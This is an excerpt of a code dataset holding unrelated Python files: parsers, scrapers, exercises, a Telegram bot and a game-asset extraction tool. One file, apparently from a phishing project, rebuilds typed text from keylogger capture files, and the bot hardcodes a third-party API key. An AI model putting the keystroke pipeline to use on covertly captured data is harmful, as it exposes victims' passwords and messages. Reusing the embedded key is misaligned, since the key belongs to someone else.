have_or_not=judge_which_say(say_words,senten)\n if have_or_not:\n new_sentence = raplace_line_feed(senten)\n new_sentence = more_space_to_one(new_sentence)\n words = segmentor.segment(new_sentence)\n postags = postagger.postag(words)\n sen=get_some_idea(say_words,postags,words,new_sentence,parser)\n if sen:\n for key in sen:\n sens=\"\\t\".join(list(set([data[1] for data in sen[key]])))\n if key not in res:\n res[key]=[]\n res[key].append(sens)\n return res\n\n\nif __name__==\"__main__\":\n # get_all_name(\"lclnew.txt\",\"name.txt\")\n #print(get_dependency_word(\"刘春玲慷慨激昂的说道,这里没有东西\"))\n # res=get_one_name(\"刘春玲说了什么话\")\n s=get_one_say_sentence(\"刘春玲说,部队啊。\")\n 
print(s)\n","sub_path":"project1/parse_sentences.py","file_name":"parse_sentences.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"13086950","text":"import pandas as pd\nimport datetime\nimport os\nimport numpy as np\nimport itertools\n\nos.chdir('../')\n\nfrom configs.keylog_cfg import *\n\n#####################\n##### functions #####\n#####################\n\ndef raw_keylog_data_to_df(raw_keylogged_data):\n\n list_of_dfs = []\n\n counter = 0\n\n for data in raw_keylogged_data:\n\n tmp = {k:v for k,v in [i.split(': ') for i in data]}\n raw_keylog_dict = {}\n raw_keylog_dict['timestamp'] = list(tmp.keys())\n raw_keylog_dict['keypress'] = list(tmp.values())\n\n df_tmp = pd.DataFrame(raw_keylog_dict)\n df_tmp['file_suffix'] = files_to_read[counter][-11:].replace('.', '').replace('txt', '')\n counter += 1\n\n list_of_dfs.append(df_tmp)\n\n df = pd.concat(list_of_dfs, axis=0)\n\n return df\n\n\ndef group_keylogged_df(df, groupby_keypress = 'Key.enter'):\n\n df['group'] = np.nan\n df.loc[df['keypress'] == groupby_keypress, 'group'] = 1\n df['group'] = df.groupby('keypress')['group'].transform(lambda x: x.cumsum())\n df['group'].bfill(inplace=True)\n\n df_grouped = df.groupby('group').agg({'timestamp': [min, max],\n 'keypress': [lambda x: ''.join(x)],\n 'file_suffix': [min]})\n\n df_grouped.columns = list(pd.Index([str(e[0]).lower() + '_' + str(e[1]).lower()\\\n for e in df_grouped.columns.tolist()])\\\n .str.replace(' ', '_')\\\n .str.replace('_', '')\\\n .str.replace('file_suffix_min', 'file_suffix'))\n df_grouped.reset_index(inplace=True, drop=True)\n\n return df_grouped\n\n\n\n########################################\n##### parse the raw keylogged data #####\n########################################\n\nfiles_to_read = [READ_KEYLOGGED_DIR + i for i in list(itertools.chain(*list(itertools.chain.from_iterable([f for f in os.walk(READ_KEYLOGGED_DIR)])))) if 
i.endswith('.txt')]\n\nraw_keylogged_data = []\n\nfor f in files_to_read:\n raw_keylogged_data.append(open(f, 'r').readlines())\n\ndf = raw_keylog_data_to_df(raw_keylogged_data)\ndf['keypress'] = df['keypress'].str.replace('\\n', '').str.replace(\"'\", \"\")\n\ndf_grouped = group_keylogged_df(df)\n\ndf_grouped.to_csv(WRITE_KEYLOGGED_DIR + str(datetime.datetime.today()).replace(' ', ''))\n","sub_path":"phishing/scripts/parse_keylogged_output.py","file_name":"parse_keylogged_output.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"589854456","text":"#!/usr/bin/env python3\nimport sys\nimport urllib.request\nimport json\nimport csv\nimport time\n\nPAUSE = 0.1\n\ndef main(argv):\n owner = argv[0]\n repo = argv[1]\n token = argv[2]\n\n print('Getting watchers...')\n users = get_users(owner, repo, token)\n\n info = []\n\n print('Looking up user info...')\n info = get_info(users, token)\n\n if len(info) == 0:\n print('No users to lookup...exiting...')\n return\n\n csvf = open('watchers.csv', 'w')\n csvw = csv.writer(csvf)\n\n header = info[0].keys()\n csvw.writerow(header)\n\n for i in info:\n csvw.writerow(i.values())\n\n csvf.close()\n print(\"File writen to 'watchers.csv'\")\n return\n\ndef get_users(owner, repo, token):\n users = []\n reading = True\n page = 0\n\n while reading:\n url = 'https://api.github.com/repos/'+str(owner)+'/'+str(repo) \\\n +'/subscribers?page='+str(page)+'&access_token='+str(token)\n try:\n time.sleep(PAUSE)\n resp = urllib.request.urlopen(url)\n data = json.loads(resp.read())\n\n if data and len(data) > 0:\n for u in data:\n if u['login'] not in users:\n users.append(u['login'])\n print('Finished page '+str(page))\n page += 1\n else:\n reading = False\n\n except:\n print('Expception with URL... 
over rate limit?')\n reading = False\n\n print('Users found: '+str(len(users)))\n return users\n\ndef get_info(users, token):\n cnt = 1\n info = []\n\n for u in users:\n time.sleep(PAUSE)\n lookup = get_user_info(u, token)\n if lookup:\n info.append(lookup)\n if cnt % 10 == 0:\n print('Looked up '+str(cnt)+'/'+str(len(users))+' users')\n cnt += 1\n\n return info\n\ndef get_user_info(user, token):\n info = {}\n url = 'https://api.github.com/users/'+str(user)+'?access_token='+str(token)\n\n try:\n resp = urllib.request.urlopen(url)\n data = json.loads(resp.read())\n\n if data and len(data) > 0:\n return data\n else:\n return None\n\n except:\n print('Expception with URL... over rate limit?')\n return None\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 3:\n main(sys.argv[1:])\n else:\n print('Usage:')\n print('\\t'+sys.argv[0]+' ')\n","sub_path":"get-watchers.py","file_name":"get-watchers.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"594052661","text":"\"\"\"\nПросить пользователя ввести данные о себе - имя, дату рождения, профессию. \nПри вводе имени, проверять, что введено имя и фамилия, через пробел. \nЕсли нет, кидать исключение с нужным текстом. \nПри вводе даты рождения, просить вводить по отдельности - год, месяц и число. \nЕсли при вводе какого-то параметра введены символы, отличные от цифр, кидать исключение с нужным текстом. \nЕсли год больше 2000 - кидать ошибку. Если месяц больше 12, кидать ошибку. \nЕсли число больше 31, кидать ошибку ( ** добавить проверку, что в определенных месяцах дней может быть меньше 31). \nСохранять данные в файл с названием {name}.txt, в формате : {name};{bith date};{profession}\\n \n \nПри использовании механизма исключений для проверок, лучше сначала перечислять все «неблагоприятные условия» и исключения, \nа затем код, который должен работать, в случае, если все проверки успешны, все введено корректно. 
\nЭто сделает код более читабельным, избавит от лишних отступов и тп.\nНапример, функция, которая проверяет, что входная строка является числом, а число не больше 100. Сравните два варианта реализации\nhttps://gist.github.com/kryskaks/34f83a420de15bae36c5cb49b9c27b28\n\nПроверьте свою реализацию задания 1 из урока, если нужно, сделайте в соответствии с этой рекомендацией.\n\"\"\"\n\nCOUNT_DAYS_IN_MONTH = {1:31,2:29,3:31,4:30,5:31,6:30,7:31,8:31,9:30,10:31,11:30,12:31}\n\ndef collect_data():\n name = input(\"Enter your name: \")\n name = name.strip(\" \")\n elem = name.split()\n # if not name.strip().__contains__(\" \"):\n # raise Exception(\"Incorrect name type\")\n if len(elem) != 2:\n raise Exception(\"Incorrect name type\")\n birthday_year = input(\"Enter your year of birthday: \")\n # if not birthday_year.isdigit():\n # raise Exception(\"Not digit\")\n check_digit(birthday_year)\n if int(birthday_year) > 2000:\n raise Exception(\"More than 2000. Incorrect type\")\n birthday_month = input(\"Enter your month of birthday: \")\n # if not birthday_month.isdigit():\n # raise Exception(\"Not digit\")\n check_digit(birthday_month)\n if int(birthday_month) > 12:\n raise Exception(\"More than 12. 
Incorrect type\")\n birthday_day = input(\"Enter your day of birthday: \")\n # if not birthday_day.isdigit():\n # raise Exception(\"Not digit\")\n check_digit(birthday_day)\n if int(birthday_day) > COUNT_DAYS_IN_MONTH.get(int(birthday_month)):\n raise Exception(\"More than\", COUNT_DAYS_IN_MONTH.get(int(birthday_month)))\n birth_date = f\"{int(birthday_day):02d}.{int(birthday_month):02d}.{birthday_year}\"\n profession = input(\"Enter your profession: \")\n\n return name, birth_date, profession\n\ndef check_digit(data):\n if not data.isdigit():\n raise Exception(\"Not digit\")\n\ndef save_in_file(name, birth_date, profession):\n with open(name+\".txt\", 'w') as f:\n f.write(\";\".join([name,birth_date,profession,\"\\n\"]))\n # f.write(f\"{name};{birth_date};{profession}\\n\")\n\nname, birth_date, profession = collect_data()\nsave_in_file(name, birth_date, profession)","sub_path":"lesson13/task02.py","file_name":"task02.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"34302062","text":"import telebot\r\nimport random\r\nimport time, re\r\nimport time\r\nimport pyowm\r\nimport requests\r\nfrom mqtt import *\r\nimport datetime\r\nimport reader\r\nimport os\r\nfrom dotenv import load_dotenv\r\nimport codecs\r\n\r\ntoken=load_dotenv()\r\ntoken = os.getenv('TOKEN')\r\nprint(token)\r\n\r\nf = codecs.open( 'taxinumbers.txt', \"r\", \"utf_8_sig\" )\r\ntaxicities = f.read()\r\ntaxicities = taxicities.split('\\r\\n')[:-1]\r\ntaxidict = dict()\r\n\r\nfor i in taxicities:\r\n key = i[:i.index(';')]\r\n taxidict[key] = i[i.index(';') + 2:]\r\n\r\ncommandlist = {'/start': 'start_message(message)', '/help' : 'help_message(message)', '/findtickets' : 'tickets_message(message)', '/route' : 'tickets_message(message)', '/weather' : 'weather_message(message)', '/music' : 'music_message(message)', '/developers' : 'developers_message(message)', '/taxi' : 
'taxi_message(message)'}\r\ncommandlist_ru = {'старт': 'start_message(message)', 'помощь' : 'help_message(message)', 'маршрут' : 'tickets_message(message)', 'погода' : 'weather_message(message)', 'музыка' : 'music_message(message)', 'разработчики' : 'developers_message(message)', 'такси' : 'taxi_message(message)'}\r\nlovestickerpack = ['CAADAgAD2QADVp29CtGSZtLSYweoFgQ', 'CAADAgAD0gADVp29Cg4FcjZ1gzWKFgQ', 'CAADAgAD0wADVp29CvUyj5fVEvk9FgQ', 'CAADAgAD2AADVp29CokJ3b9L8RQnFgQ', 'CAADAgAD3gADVp29CqXvdzhVgxXEFgQ', 'CAADAgADFQADwDZPE81WpjthnmTnFgQ', 'CAADAgADBQADwDZPE_lqX5qCa011FgQ', 'CAADAgADDQADwDZPE6T54fTUeI1TFgQ', 'CAADAgADHQADwDZPE17YptxBPd5IFgQ', 'CAADAgAD4QcAAnlc4gndRsN-Tyzk1xYE', 'CAADAgAD3wcAAnlc4gmeYgfVO_CEsxYE', 'CAADAgAD4AcAAnlc4gmXqeueTbWXlRYE', ]\r\nquestionstickerpack = ['CAADAgAD4wADVp29Cg_4Isytpgs3FgQ', 'CAADAgADEgADwDZPEzO8ngEulQc3FgQ', 'CAADAgADEAADwDZPE-qBiinxHwLoFgQ', 'CAADAgADIAADwDZPE_QPK7o-X_TPFgQ', 'CAADAgAD2wcAAnlc4gkSqCLudDgLbhYE', 'CAADAgADzwcAAnlc4gnrZCnufdBTahYE', 'CAADAgAD2QcAAnlc4gn3Ww8qzk3S3BYE', 'CAADAgAD0gcAAnlc4gmLqZ82yF4OlxYE']\r\nangrystickerpack = ['CAADAgAD3AADVp29Cpy9Gm5Tg192FgQ', 'CAADAgAD2wADVp29Clxn-p9taVttFgQ', 'CAADAgADywADVp29CllGpcs9gzQoFgQ']\r\nloadstickerpack = ['CAADAgADGAADwDZPE9b6J7-cahj4FgQ', 'CAADAgAD1QADVp29CveXwRdcmk7nFgQ', 'CAADAgADwAADVp29Ct1dnTI9q-YvFgQ', 'CAADAgAD4QADVp29ClvBlItA-NOgFgQ', 'CAADAgAD5QADVp29CggLFmSVBdGKFgQ']\r\ndeveloperslist = ['рустам', 'ярослав', 'владимир', 'даниэль', 'игорь']\r\nnongratlist = ['арина', 'ариша', 'алия']\r\n\r\nkeyboard1 = telebot.types.ReplyKeyboardMarkup(True, True)\r\nkeyboard1.row('start', 'help', 'weather', 'developers')\r\nkeyboard1.row('music', 'findtickets', 'taxi')\r\n\r\nowm = pyowm.OWM('6d00d1d4e704068d70191bad2673e0cc', language = 'ru')\r\nbot = telebot.TeleBot(token)\r\n\r\nfromplace = str()\r\ntoplace = str()\r\ndateregistration = str()\r\nstatus = ''\r\n\r\n@bot.message_handler(commands=['taxi'])\r\ndef taxi_message(message):\r\n\tbot.send_message(message.chat.id, 
'Введите город, в котором вы хотели бы заказать такси')\r\n\tbot.register_next_step_handler(message, taxi_telephone_numbers_message)\r\n\t\r\ndef taxi_telephone_numbers_message(message):\r\n\tif message.text.lower() in commandlist:\r\n\t\texec(commandlist[message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif '/' + message.text.lower() in commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telse:\r\n\t\tglobal taxidict\r\n\t\tttnumbers = taxidict[message.text.lower()]\r\n\t\tttnumbers = ttnumbers.split('. ')\r\n\t\tttnumbers = '\\n'.join(ttnumbers)\r\n\t\tbot.send_message(message.chat.id, ttnumbers)\r\n\t\r\n@bot.message_handler(commands=['developers'])\r\ndef developers_message(message):\r\n\tprint('пока в разработке')\r\n\r\n\r\n@bot.message_handler(commands=['findtickets', 'route'])\r\n\r\ndef tickets_message(message):\r\n\tbot.send_message(message.chat.id, 'Введите город отправления')\r\n\tbot.register_next_step_handler(message, fromplace_registration)\r\n\t\r\ndef fromplace_registration(message):\r\n\tglobal commandlist\r\n\tglobal fromplace\r\n\tif message.text.lower() in commandlist:\r\n\t\texec(commandlist[message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif '/' + message.text.lower() in commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telse:\r\n\t\tfromplace = message.text.lower()\r\n\t\tbot.send_message(message.chat.id, 'Введите город назначения')\r\n\t\tbot.register_next_step_handler(message, toplace_registration)\r\ndef toplace_registration(message):\r\n\tglobal commandlist\r\n\tglobal toplace\r\n\tif message.text.lower() in commandlist:\r\n\t\texec(commandlist[message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif '/' + message.text.lower() in 
commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telse:\r\n\t\ttoplace = message.text.lower()\r\n\t\tbot.send_message(message.chat.id, 'Введите дату отправления')#rzd\r\n\t\tbot.register_next_step_handler(message, date_registration)\r\ndef date_registration(message):\r\n\tglobal commandlist\r\n\tglobal fromplace\r\n\tglobal toplace\r\n\tglobal dateregistration\r\n\tglobal loadsticerpack\r\n\tif message.text.lower() in commandlist:\r\n\t\texec(commandlist[message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif '/' + message.text.lower() in commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telse:\r\n\t\tdateregistration = message.text.lower()\r\n\t\tprint(fromplace)\r\n\t\tprint(toplace)\r\n\t\tprint(dateregistration)\r\n\t\tSendler(fromInput=fromplace,fromOutput=toplace,date=dateregistration).send()\r\n\t\tbot.send_message(message.chat.id, 'Ищу билеты по выбранному направлению')\r\n\t\tbot.send_sticker(message.chat.id, random.choice(loadstickerpack))\r\n\t\tbot.send_message(message.chat.id, 'Билеты по маршруту {0} - {1} на {2} '.format(fromplace, toplace, dateregistration) + \"\\n\" + reader.read()) \r\n \r\n \r\n@bot.message_handler(commands=['start'])\r\n\r\ndef start_message(message):\r\n\tglobal weatherinformation\r\n\tglobal lovestickerpack\r\n\tbot.send_message(message.chat.id, 'Привет!\\nМеня зовут...плевать, я же тестовый бот\\nВот список моих функций на данный момент:\\n1./start\\n2./weather\\n3./help\\n4./rzd', reply_markup=keyboard1)\r\n\tbot.send_sticker(message.chat.id, random.choice(lovestickerpack))\r\n \r\n@bot.message_handler(commands=['weather'])\r\n\r\ndef weather_message(message):\r\n\tbot.send_message(message.chat.id, 'Напишите город, погодные условия которого вы хотели бы узнать')\r\n\tbot.register_next_step_handler(message, weather_information)\r\ndef weather_information(message):\r\n\tplace=''\r\n\tglobal status\r\n\tglobal 
angrystickerpack\r\n\tif message.text.lower() in commandlist:\r\n\t\texec(commandlist[message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif '/' + message.text.lower() in commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telse:\r\n\t\ttry:\r\n\t\t\tplace = message.text.lower()\r\n\t\t\tobservation = owm.weather_at_place(place)\r\n\t\t\tweather = observation.get_weather()\r\n\t\t\tstatus = weather.get_detailed_status()\r\n\t\t\ttemp = weather.get_temperature('celsius')['temp']\r\n\t\t\twind = weather.get_wind()['speed']\r\n\t\t\tprint(weather)\r\n\t\t\tweathercity = message.text[0].upper() + message.text.lower()[1:]\r\n\t\t\tbot.send_message(message.chat.id, \"Погода города \" + weathercity + \"\\nТемпература: \" + str(temp) + \"°C\" + \"\\nНа улице: \" + str.title(status) + \"\\nСкорость Ветра: \" + str(wind) + \"м/c\")\r\n\t\t\tif temp >= 15:\r\n\t\t\t\tbot.send_message(message.chat.id, \"Погода-mood: Cамое-то \")\r\n\t\t\telif 15 > temp and temp > 0:\r\n\t\t\t\tbot.send_message(message.chat.id, \"Погода-mood: Накинь что нибудь на себя \")\r\n\t\t\telif temp < 0 and -25 < temp:\r\n\t\t\t\tbot.send_message(message.chat.id, \"Погода-mood: Одевайся мать, пора воевать \")\r\n\t\t\telif temp <= -25:\r\n\t\t\t\tbot.send_message(message.chat.id, \"Погода-mood: Ты умрёшь, если уйдёшь\")\r\n\t\texcept pyowm.exceptions.api_response_error.NotFoundError:\r\n\t\t\tbot.reply_to(message, 'Врешь, такого города нет на картах')\r\n\t\t\tbot.send_sticker(message.chat.id, random.choice(angrystickerpack))\r\n \r\n@bot.message_handler(commands=['help'])\r\ndef help_message(message):\r\n\tglobal lovestickerpack\r\n\tbot.send_message(message.chat.id, '1./start - эта функция позволяет Вам сбросить наш диалог и вернуться к исходной точке\\n2./weather - позволяет вам узнать состояние погоды в данном месте\\n3./help - эта функция сработала прямо 
сейчас')\r\n\tbot.send_sticker(message.chat.id,random.choice(lovestickerpack))\r\n \r\n \r\n@bot.message_handler(commands=['music'])\r\ndef music_message(message):\r\n\taudiolist = []\r\n\tfor i in range(3):\r\n\t\twhile True:\r\n\t\t\tn = random.randint(1,11)\r\n\t\t\tif n not in audiolist:\r\n\t\t\t\tbreak\r\n\t\taudiolist.append(n)\r\n\t\taudio = open(str(n) + \".mp3\", mode='rb')\r\n\t\tprint(\"opened \" + str(n) + \".mp3\")\r\n\t\tbot.send_audio(message.from_user.id, audio, timeout=1000)\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef text_analyze(message):\r\n\tglobal lovestickerpack\r\n\tglobal angrystickerpack\r\n\tglobal questionstickerpack\r\n\tif 'билеты' in message.text.lower() or 'найти билеты' in message.text.lower():\r\n\t\tbot.register_next_step_handler(message, tickets_message)\r\n\telif '/' + message.text.lower() in commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif message.text.lower() in developerslist:\r\n\t\tdevelopername = message.text[0].upper() + message.text.lower[1:]\r\n\t\tbot.reply_to(message, 'в моей системе рейтинга {0} стоит на первом месте'.format(developername))\r\n\t\tbot.send_sticker(message.chat.id, random.choice(lovestickerpack))\r\n\telif message.text.lower() in nongratlist:\r\n\t\tnongratname = message.text[0].upper() + message.text.lower()[1:]\r\n\t\tbot.reply_to(message, '{0}...{0}...звучит как что-то неприятное'.format(nongratname))\r\n\t\tbot.send_sticker(message.chat.id, random.choice(angrystickerpack))\r\n\telif message.text.lower():\r\n\t\tbot.reply_to(message, 'RUSSIAN, MOTHERFUCKER, DO YOU SPEAK IT ?')\r\n\t\tbot.send_sticker(message.chat.id, 
random.choice(questionstickerpack))\r\nbot.polling()\r\n","sub_path":"telegrambot[1].py","file_name":"telegrambot[1].py","file_ext":"py","file_size_in_byte":10669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"294683999","text":"# -*- coding: utf-8 -*-\n\"\"\"Test them contribs.\"\"\"\n\nimport gitcontrib\nimport json\nimport pytest\nimport subprocess\nimport sys\n\nu_string = 'Usage:\\ngitcontrib [--json] [-p, --path path] [extension ...]\\n'\n\n\n@pytest.fixture\ndef git_repo(tmpdir):\n subprocess.check_call(['git', 'init', str(tmpdir)])\n return tmpdir\n\n\ndef test_usage(capsys):\n gitcontrib.usage()\n out, err = capsys.readouterr()\n assert err == u_string\n\n\ndef test_git(git_repo):\n assert 'nothing to commit' in gitcontrib.git(str(git_repo), 'status')\n\n\ndef test_badArg(capsys):\n sys.argv = ['gitcontrib', '-a']\n gitcontrib.main()\n out, err = capsys.readouterr()\n assert err == u_string\n\n\ndef test_json(capsys):\n total = 20\n auth = {'a': 12, 'b': 2, 'c': 1, 'd': 5}\n expect = 0.25\n gitcontrib.json_print(total, auth, expect)\n out, err = capsys.readouterr()\n j_data = json.loads(out)\n assert j_data['a']['met_expected']\n assert j_data['b']['lines'] == 2\n","sub_path":"test_gitcontrib.py","file_name":"test_gitcontrib.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"240493311","text":"# Aidan Bauer 1/31/20\nfrom turtle import *\nspeed(0)\nfor i in range(3):#loop for bottom row of circles\n circle(50)\n penup()\n forward(100)\n pendown()\npenup()\nsetposition(50,85)\npendown()\nfor i in range(2):#loop for second row of circles\n circle(50)\n penup()\n forward(100)\n pendown()\npenup()\nsetposition(100,170)\npendown()\ncircle(50)#makes top 
circle\n\nturtle.getscreen()._root.mainloop()","sub_path":"ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"440983490","text":"import json\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Credentials(dict):\n def __init__(self, **kwargs):\n dict.__init__(self, **kwargs)\n # We don't follow PEP8 here because we only pass this object as a JSON\n self.clientId = kwargs['clientId']\n self.accessToken = kwargs['accessToken']\n\n try:\n self.certificate = kwargs['certificate']\n except KeyError:\n logger.warning('''No certificate is present in the given credentials. If the credentials are temporary you won't be able to download anything''')\n\n def __getitem__(self, item):\n value = dict.__getitem__(self, item)\n # The taskcluster client always expects each argument of the Credentials to be a string,\n # even for the certificate. To let the user copy and paste the certificate directly from\n # https://auth.taskcluster.net/ without escaping all the quotes, we perform this change\n # of type.\n return self._enforce_string(value)\n\n @staticmethod\n def from_file(file_path):\n with open(file_path) as fd:\n credentials = json.load(fd)\n return Credentials(**credentials)\n\n @staticmethod\n def _enforce_string(value):\n return value if type(value) in (str, unicode) else json.dumps(value, ensure_ascii=True)\n","sub_path":"taskcluster_util/model/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"528727925","text":"'''Aula 10 - Exerc.05\r\nURI 1094\r\n'''\r\n#Felipe Backes Kettl\r\n\r\ntestes= int(input())\r\ntotal = 0\r\ntotalC = 0\r\ntotalR = 0\r\ntotalS = 0\r\n\r\nfor x in range(testes):\r\n qtd, tip = input().upper().split()\r\n qtd = int(qtd)\r\n total += qtd\r\n if 'C' in tip:\r\n totalC 
+=qtd\r\n elif 'R' in tip:\r\n totalR +=qtd\r\n elif 'S' in tip:\r\n totalS += qtd\r\n\r\nprint(f'Total: {total} cobaias')\r\nprint(f'Total de coelhos: {totalC}')\r\nprint(f'Total de ratos: {totalR}')\r\nprint(f'Total de sapos: {totalS}')\r\nprint(f'Percentual de coelhos: {(totalC/total) * 100:.2f} %')\r\nprint(f'Percentual de ratos: {(totalR/total)*100:.2f} %')\r\nprint(f'Percentual de sapos: {(totalS/total)*100:.2f} %')","sub_path":"Aula 10/Aula10_Ex05.py","file_name":"Aula10_Ex05.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"299996389","text":"def main():\n data_path = 'questions-words.txt'\n out_path = 'knock91_family'\n\n with open(out_path, 'w', encoding='utf8') as f:\n is_target = False\n lines = []\n for line in open(data_path, encoding='utf8'):\n if line.rstrip() == ': family':\n is_target = True\n continue\n if not is_target:\n continue\n if line.startswith(': '):\n break\n lines.append(line)\n f.writelines(lines)\n\n\nif __name__ == '__main__':\n main()\n\n\n''' 問\n91. 
アナロジーデータの準備\n\n単語アナロジーの評価データをダウンロードせよ.\nこのデータ中で\": \"で始まる行はセクション名を表す.\n例えば,\": capital-common-countries\"という行は,\n\"capital-common-countries\"というセクションの開始を表している.\nダウンロードした評価データの中で,\n\"family\"というセクションに含まれる評価事例を抜き出してファイルに保存せよ.\n'''\n\n''' 実行結果\n$ head knock91_family\nboy girl brother sister\nboy girl brothers sisters\nboy girl dad mom\nboy girl father mother\nboy girl grandfather grandmother\nboy girl grandpa grandma\nboy girl grandson granddaughter\nboy girl groom bride\nboy girl he she\nboy girl his her\n'''\n","sub_path":"homma/chapter10/knock91.py","file_name":"knock91.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"546644521","text":"import logging\nimport shutil\nimport threading\nimport tkinter as tk\nfrom pathlib import Path\nfrom tkinter import ttk\n\nfrom modlunky2.assets.assets import AssetStore\nfrom modlunky2.assets.constants import (\n EXTRACTED_DIR,\n FILEPATH_DIRS,\n OVERRIDES_DIR,\n PACKS_DIR,\n)\nfrom modlunky2.ui.utils import is_patched, log_exception\nfrom modlunky2.ui.widgets import Tab, ToolTip\n\nlogger = logging.getLogger(\"modlunky2\")\n\n\nMODS = Path(\"Mods\")\n\nTOP_LEVEL_DIRS = [EXTRACTED_DIR, PACKS_DIR, OVERRIDES_DIR]\n\n\nclass ExtractTab(Tab):\n def __init__(self, tab_control, install_dir, *args, **kwargs):\n super().__init__(tab_control, *args, **kwargs)\n self.tab_control = tab_control\n self.install_dir = install_dir\n\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n self.rowconfigure(1, minsize=60)\n\n self.top_frame = ttk.Frame(self)\n self.top_frame.rowconfigure(0, weight=1)\n self.top_frame.columnconfigure(0, weight=1)\n self.top_frame.columnconfigure(1, minsize=250)\n self.top_frame.grid(row=0, column=0, sticky=\"nswe\")\n\n self.exe_frame = ttk.LabelFrame(self.top_frame, text=\"Select exe to Extract\")\n self.exe_frame.grid(row=0, column=0, pady=5, padx=5, sticky=\"nswe\")\n self.exe_frame.rowconfigure(0, 
weight=1)\n self.exe_frame.columnconfigure(0, weight=1)\n self.exe_frame.columnconfigure(1)\n\n self.list_box = tk.Listbox(self.exe_frame)\n self.list_box.grid(row=0, column=0, sticky=\"nswe\")\n self.scrollbar = ttk.Scrollbar(self.exe_frame)\n self.scrollbar.grid(row=0, column=1, sticky=\"nes\")\n\n self.config_frame = ttk.LabelFrame(self.top_frame, text=\"Config\")\n self.config_frame.grid(row=0, column=1, pady=5, padx=5, sticky=\"nswe\")\n\n self.recompress = tk.BooleanVar()\n self.recompress.set(True)\n self.checkbox_recompress = tk.Checkbutton(\n self.config_frame,\n text='Recompress', variable=self.recompress, onvalue=True, offvalue=False,\n )\n self.checkbox_recompress.grid(row=0, sticky=\"nw\")\n ToolTip(self.checkbox_recompress, (\n \"Recompress assets to speed up futuring packing.\\n\"\n \"Not necessary if you just want the extracted assets.\"\n ))\n\n self.create_entity = tk.BooleanVar()\n self.create_entity.set(True)\n self.checkbox_create_entity = tk.Checkbutton(\n self.config_frame,\n text='Create Entity Sprites', variable=self.create_entity, onvalue=True, offvalue=False,\n )\n self.checkbox_create_entity.grid(row=1, sticky=\"nw\")\n ToolTip(self.checkbox_create_entity, (\n \"Create merged entity spritesheets. These provide a simpler\\n\"\n \"interface to some entity mods.\"\n ))\n\n self.list_box.config(yscrollcommand=self.scrollbar.set)\n self.scrollbar.config(command=self.list_box.yview)\n\n self.button_extract = ttk.Button(self, text=\"Extract\", command=self.extract)\n self.button_extract.grid(row=1, column=0, pady=5, padx=5, sticky=\"nswe\")\n ToolTip(self.button_extract, (\n \"Extract assets from EXE.\"\n ))\n\n def extract(self):\n idx = self.list_box.curselection()\n if not idx:\n return\n\n selected_exe = self.list_box.get(idx)\n thread = threading.Thread(\n target=self.extract_assets,\n args=(selected_exe, self.recompress.get(), self.create_entity.get()))\n thread.start()\n\n def get_exes(self):\n exes = []\n # Don't recurse forever. 
3 levels should be enough\n exes.extend(self.install_dir.glob(\"*.exe\"))\n exes.extend(self.install_dir.glob(\"*/*.exe\"))\n exes.extend(self.install_dir.glob(\"*/*/*.exe\"))\n return [\n exe.relative_to(self.install_dir)\n for exe in exes\n # Exclude modlunky2 which is likely in the install directory\n if exe.name not in [\"modlunky2.exe\"]\n ]\n\n def on_load(self):\n self.list_box.delete(0, tk.END)\n for exe in self.get_exes():\n self.list_box.insert(tk.END, str(exe))\n\n @log_exception\n def extract_assets(self, target, recompress, create_entity_sheets):\n\n exe_filename = self.install_dir / target\n\n if is_patched(exe_filename):\n logger.critical((\n \"%s is a patched exe. Can't extract. You should Restore Exe\"\n \" or validate game files to get a clean exe before Extracting.\"\n ), exe_filename)\n return\n\n mods_dir = self.install_dir / MODS\n\n for dir_ in TOP_LEVEL_DIRS:\n (mods_dir / dir_).mkdir(parents=True, exist_ok=True)\n\n for dir_ in FILEPATH_DIRS:\n (mods_dir / EXTRACTED_DIR / dir_).mkdir(parents=True, exist_ok=True)\n (mods_dir / \".compressed\" / 